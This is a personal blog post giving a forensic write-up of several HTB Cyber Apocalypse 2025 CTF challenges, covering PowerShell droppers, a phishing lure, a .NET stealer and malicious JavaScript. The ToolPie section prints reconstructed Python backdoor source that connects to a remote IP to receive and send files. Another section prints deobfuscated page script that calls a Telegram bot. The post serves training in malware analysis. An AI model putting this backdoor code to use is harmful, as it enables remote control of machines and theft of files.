Avatar
CTI Analyst at @ActiveFence
Forensic at @World Wide Flags
Operator at @Cookie Han Hoan

HTB Cyber Apocalypse CTF 2025 - Tales from Eldoria

Hi guys, it has been a long time I did not post anything on my blog. Today is a special day since it is the end of HTB Cyber Apocalypse CTF 2025. Now this is my writeup for some forensic challenges. I hope that these solutions will be useful with all of you. Let’s go!

image

Thorin’s Amulet + A new Hire

image

image

They are the easy challenges, so I will explain them quickly to spend time for the medium and hard challenge. First, with Thorin’s Amulet, they gave us an Powershell file, open it and you will see an base64 string. Decode and you will get another URL:

image

image

Spawning Docker, access update endpoint and it will download another Powershell file: update.ps1:

image

image

You can see that it will download a541a.ps1 and execute it. Now we just run the Invoke-WebRequest command, we will get the file:

image

It will decode the string from hex format. Now we just decode it and you will get the flag:

image

Flag: HTB{7h0R1N_H45_4lW4Y5_833n_4N_9r347_1NV3n70r}

Next, we will discuss about A new Hire, they gave us a file named email.eml, we can open it by using Thunderbird:

image

In summary, his CV can open by accessing index.php, now we will spawn the Docker and access the endpoint:

image

This is the interface of the website, inspecting the website we can see it will download file from a directory:

image

image

I access parent directory and I found an suspicious directory: configs:

image

Click to client.py, decode the key and get the flag:

image

image

Flag: HTB{4PT_28_4nd_m1cr0s0ft_s34rch=1n1t14l_4cc3s!!}

Slient trap

image

This challenge was created by my big brother: bquanman and every year I join HTB, I love his challenges so much. It’s kinda long so I will summarise how I solved them:

1. What is the subject of the first email that the victim opened and replied to?: Check in HTTP stream 4

image

2. On what date and time was the suspicious email sent? (Format: YYYY-MM-DD_HH:MM) (for example: 1945-04-30_12:34): Check in HTTP stream 8

image

3. What is the MD5 hash of the malware file?:

image

image

This zip file was locked by password, you could look for password also in HTTP stream 8:

image

Unzip by password we found, use md5sum and you will get the answer:

image

4. What credentials were used to log into the attacker’s mailbox? (Format: username:password):

The exe file we found was compiled by .NET, then we can use dnSpy to decompile. Looking at the code and you will see the credential:

image

5. What is the name of the task scheduled by the attacker?:

Digging deeper to the code, you will see the encrypt function which was used to encrypt the traffic:

image

From here you can decrypt the traffic easily because it used RC4 and XOR to encrypt:

import base64
def rc4(key, data):
    S = list(range(256))
    key_bytes = bytearray(key)
    j = 0
    for i in range(256):
        j = (j + S[i] + key_bytes[i % len(key_bytes)]) % 256
        S[i], S[j] = S[j], S[i]
    result = bytearray(len(data))
    i = j = 0
    for k in range(len(data)):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        result[k] = data[k] ^ S[(S[i] + S[j]) % 256]
    
    return bytes(result)

key = bytearray([
    168, 115, 174, 213, 168, 222, 72, 36, 91, 209, 242, 128, 69, 99, 195, 164,
    238, 182, 67, 92, 7, 121, 164, 86, 121, 10, 93, 4, 140, 111, 248, 44,
    30, 94, 48, 54, 45, 100, 184, 54, 28, 82, 201, 188, 203, 150, 123, 163,
    229, 138, 177, 51, 164, 232, 86, 154, 179, 143, 144, 22, 134, 12, 40, 243,
    55, 2, 73, 103, 99, 243, 236, 119, 9, 120, 247, 25, 132, 137, 67, 66,
    111, 240, 108, 86, 85, 63, 44, 49, 241, 6, 3, 170, 131, 150, 53, 49,
    126, 72, 60, 36, 144, 248, 55, 10, 241, 208, 163, 217, 49, 154, 206, 227,
    25, 99, 18, 144, 134, 169, 237, 100, 117, 22, 11, 150, 157, 230, 173, 38,
    72, 99, 129, 30, 220, 112, 226, 56, 16, 114, 133, 22, 96, 1, 90, 72,
    162, 38, 143, 186, 35, 142, 128, 234, 196, 239, 134, 178, 205, 229, 121, 225,
    246, 232, 205, 236, 254, 152, 145, 98, 126, 29, 217, 74, 177, 142, 19, 190,
    182, 151, 233, 157, 76, 74, 104, 155, 79, 115, 5, 18, 204, 65, 254, 204,
    118, 71, 92, 33, 58, 112, 206, 151, 103, 179, 24, 164, 219, 98, 81, 6,
    241, 100, 228, 190, 96, 140, 128, 1, 161, 246, 236, 25, 62, 100, 87, 145,
    185, 45, 61, 143, 52, 8, 227, 32, 233, 37, 183, 101, 89, 24, 125, 203,
    227, 9, 146, 156, 208, 206, 194, 134, 194, 23, 233, 100, 38, 158, 58, 159
])

def decrypt(base64_data):
    encrypted_bytes = base64.b64decode(base64_data)
    decrypted_bytes = rc4(key, encrypted_bytes)
    return decrypted_bytes

decrypted = decrypt("") #put your input here
print(decrypted.decode('utf-8', errors='ignore')) 

After tried decrypting all commands, I got the scheduled task in TCP Stream 35:

image

6. What is the API key leaked from the highly valuable file discovered by the attacker?:

Do the same and you will get the API key in TCP stream 97:

image

ToolPie

This challenge was kinda bruh with me because of malware sample. Btw, it’s still worth to try.

1. What is the IP address responsible for compromising the website?: 194.59.6.66

A suspicious python file was uploaded to the server by this IP, so this is the answer

image

2. What is the name of the endpoint exploited by the attacker?: execute

image

These questions aftter

3. What is the name of the obfuscation tool used by the attacker?:

These questions after were extremely tough because we could not run and decompile the file normally, instead we had to interact with Python bytecode. From here the best way is that you could try to encode the code by base64 and run it on Python:

image

I hate these steps after since it took me a long time to do. Fortunately, I got a nearly completed source code but btw, it displayed nearly 95% how the python code worked. Also thank you my friend for helping me this step:

import os
import socket
import threading
import time
import random
import string
from Crypto.Cipher import AES
from Crypto.Util import Padding

BUFFER_SIZE = 4096
SEPARATOR = "<SEPARATOR>"
CONN = ("13.61.7.218", 55155)

def enc_mes(mes, key):
    cipher = AES.new(key.encode(), AES.MODE_CBC)
    cypher_block = cipher.iv + cipher.encrypt(Padding.pad(mes.encode(), 16))
    return cypher_block

def dec_file_mes(mes, key):
    cipher = AES.new(key.encode(), AES.MODE_CBC, iv=key.encode())
    s = Padding.unpad(cipher.decrypt(mes[16:]), 16)
    return s

def dec_mes(mes, key):
    try:
        cipher = AES.new(key.encode(), AES.MODE_CBC, iv=key.encode())
        v = Padding.unpad(cipher.decrypt(mes[16:]), 16)
        return v
    except Exception:
        return b"echo Try it again"

def receive_file():
    client2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client2.connect(("13.61.7.218", 54163))
    
    # Receive file metadata
    received = client2.recv(BUFFER_SIZE).decode()
    filename, filesize = received.split(SEPARATOR)
    filesize = int(filesize)
    
    # Decrypt and save file
    with open(filename, "wb") as f:
        total_bytes = 0
        while total_bytes < filesize:
            bytes_read = client2.recv(BUFFER_SIZE)
            decr_file = dec_file_mes(bytes_read, "5UUfizsRsP7oOCAq")  # Key should be defined elsewhere
            f.write(decr_file)
            total_bytes += len(bytes_read)
    
    client2.send(enc_mes("ok2", "5UUfizsRsP7oOCAq"))
    client2.close()

def receive(client, k):
    client.settimeout(600)
    while True:
        try:
            message = client.recv(1024)
            msg = dec_mes(message, k)
            if msg == b"check":
                enc_answer = enc_mes("check-ok", k)
                client.send(enc_answer)
            elif msg == b"send_file":
                receive_file_thread = threading.Thread(target=receive_file)
                receive_file_thread.start()
            elif msg == b"get_file":
                with open("some_file", "rb") as f:  # File path should be dynamic
                    bytes_read = f.read()
                    bytes_enc = enc_mes(bytes_read, k)
                    client.sendall(bytes_enc)
            else:
                print("Bad command!")
        except Exception:
            time.sleep(10)
            print("Reconnect!")
            client.close()
            client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            client.connect(CONN)
            continue

if __name__ == "__main__":
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect(("13.61.7.218", 55155))
    key = "5UUfizsRsP7oOCAq"  # This should be securely generated or provided
    receive_thread = threading.Thread(target=receive, args=(client, key))
    receive_thread.start()

Basically, the data in traffic was encrypted by AES-CBC which key and iv were same. It’s easy to decrypt just using CyberChef (you can do it by yourself):

image

image

image

Tales for the Brave

This challenge is the greatest in this competition in my opinion. First, accessing the website:

image

Inspecting the website, looking at to the source code especially in index.js, it’s obfuscated:

image

You can deobfuscate it by using this tool. Copying the code and you will get the new one:

image

From here I can extract the value of variable by just using Chrome console:

image

You can see it’s related to AES and Base64. Next in the part 2 you can get the key and IV to decrypt AES content:

eval(CryptoJS[_$_9b39[1]][_$_9b39[0]]({ciphertext:CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](btoa(unescape(".....")))},
CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](btoa(unescape("..."))),
{iv:CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](btoa(unescape("....")))}).toString(CryptoJS[_$_9b39[4]][_$_9b39[5]]));

image

image

image

Decrypt all contents and you will get the another source code:

_$_5975 = ['nZiIjaXAVuzO4aBCf5eQ5ifQI7rUBI3qy/5t0Djf0pG+tCL3Y2bKBCFIf3TZ0Q==',
           's3cur3k3y',
           'Base64', 'enc', 'toString', '', 'join', 'SHA256', 
           '18m0oThLAr5NfLP4hTycCGf0BIu0dG+P/1xvnW6O29g=', // Hash to verify
           'Utf8', 'parse', 'decrypt', 'RC4Drop', 'https://api.telegram.org', 
           'fromCharCode', 'onreadystatechange', 'readyState', 'DONE', 'responseText', 
           'text', 'result', 'log', 'replace', 'location', 'Form submitted!', 
           'GET', 'forwardMessage?chat_id=', '&from_chat_id=', '&message_id=5', 'open', 'send']

function G(r) {
    return function () {
        var r = Array.prototype.slice.call(arguments), o = r.shift();
        return r.reverse().map(function (r, t) { 
            return String.fromCharCode(r - o - 7 - t) 
        }).join('')
    }(43, 106, 167, 103, 163, 98) + 
    1354343..toString(36).toLowerCase() + 
    21..toString(36).toLowerCase().split('').map(function (r) { 
        return String.fromCharCode(r.charCodeAt() + -13) 
    }).join('') + 
    4..toString(36).toLowerCase() + 
    32..toString(36).toLowerCase().split('').map(function (r) { 
        return String.fromCharCode(r.charCodeAt() + -39) 
    }).join('') + 
    381..toString(36).toLowerCase().split('').map(function (r) { 
        return String.fromCharCode(r.charCodeAt() + -13) 
    }).join('') + 
    function () {
        var r = Array.prototype.slice.call(arguments), o = r.shift();
        return r.reverse().map(function (r, t) { 
            return String.fromCharCode(r - o - 60 - t) 
        }).join('')
    }(42, 216, 153, 153, 213, 187);
}

document.getElementById("newsletterForm").addEventListener("submit", function(e) {
  e.preventDefault();
  const emailField = document.getElementById("email");
  const descriptionField = document.getElementById("descriptionField");
  let isValid = true;
  if (!emailField.value) {
    emailField.classList.add("shake");
    isValid = false;
    setTimeout(() => {
      return emailField.classList.remove("shake");
    }, 500);
  }
  if (!isValid) {
    return;
  }
  const emailValue = emailField.value;
  const specialKey = emailValue.split("@")[0];
  const desc = parseInt(descriptionField.value, 10);
  f(specialKey, desc);
});

function f(oferkfer, icd) {
  const channel_id = -1002496072246;
  var enc_token = "nZiIjaXAVuzO4aBCf5eQ5ifQI7rUBI3qy/5t0Djf0pG+tCL3Y2bKBCFIf3TZ0Q==";
  // _$_5975[1] = s3cur3k3y
  // _$_5975[8] = 18m0oThLAr5NfLP4hTycCGf0BIu0dG+P/1xvnW6O29g=
  if (oferkfer === G(_$_5975[1]) && 
        CryptoJS.SHA256(sequence.join('')).toString(CryptoJS.enc.Base64) === _$_5975[8]) {
    var decrypted = CryptoJS.RC4Drop.decrypt(
            enc_token, 
            CryptoJS.enc.Utf8.parse(oferkfer), 
            { drop: 192 }
        ).toString(CryptoJS.enc.Utf8);
    var HOST = "https://api.telegram.org/bot"+ decrypted;
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
      if (xhr.readyState == XMLHttpRequest.DONE) {
        const resp = JSON.parse(xhr.responseText);
        try {
          const link = resp.result.text;
          window.location.replace(link);
        } catch (error) {
          alert("Form submitted!");
        }
      }
    };
    xhr.open("GET", HOST + "/" + "forwardMessage?chat_id=" + icd + "&from_chat_id=" + channel_id + "&message_id=5");
    xhr.send(null);
  } else {
    alert("Form submitted!");
  }
}
var sequence = [];

function l() {
  sequence.push(this.id);
}
var checkboxes = document.querySelectorAll("input[class=cb]");
for (var i = 0; i < checkboxes.length; i++) {
  checkboxes[i].addEventListener("change", l);
}

This script will connect to a Telegram channel, this was displayed by decrypting the base64 string:

image

From here I use my legendary tool: telegram-bot-dumper to listen their chat and I got another sample and its password:

image

image

From here I used FakeNet, run the file and you will get a nice result:

image

You will get a JWT token, use JWT decoder:

image

Decode the base64 2 time and you will get the flag:

image

This is my last words so far. Thank you for reading my article. I must say this is the best competition I have joined. 5 days are not long but also not short, but we were really united. Thank you HackTheBox for celebrating a good competition. Love a lot!

all tags